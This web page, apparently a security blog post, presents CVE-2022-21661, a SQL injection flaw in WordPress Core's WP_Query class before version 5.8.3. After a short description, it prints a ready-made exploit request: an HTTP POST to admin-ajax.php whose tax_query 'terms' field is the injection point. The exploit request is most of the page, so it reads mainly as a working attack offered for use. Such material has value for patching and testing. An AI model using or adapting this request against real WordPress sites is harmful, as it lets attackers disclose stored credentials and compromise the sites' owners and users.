in , ,

CVE-2022-21661 – WordPress Core 5.8.2 – ‘WP_Query’ SQL Injection

This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core, Authentication is not required to exploit this vulnerability, The specific flaw exists within the WP_Query class.
The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries,
An attacker can leverage this vulnerability to disclose stored credentials, leading to compromise further.

Vulnerability NameWordPress Core 5.8.2 – ‘WP_Query’ SQL Injection
CVECVE-2022-21661
Affected versionVersion: < 5.8.3
Tested onWindows 10
Exploit AuthorAryan Chehreghani
# [ Exploit Code ] :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure_Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close 
Content-Type: application/x-www-form-urlencoded

action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}

What do you think?

Written by SH

Leave a Reply

Your email address will not be published. Required fields are marked *

GIPHY App Key not set. Please check settings

CVE-2022-23093 Possible RCE in FreeBSD

pki-core XML external entity (XXE) Bug (CVE-2022-2414)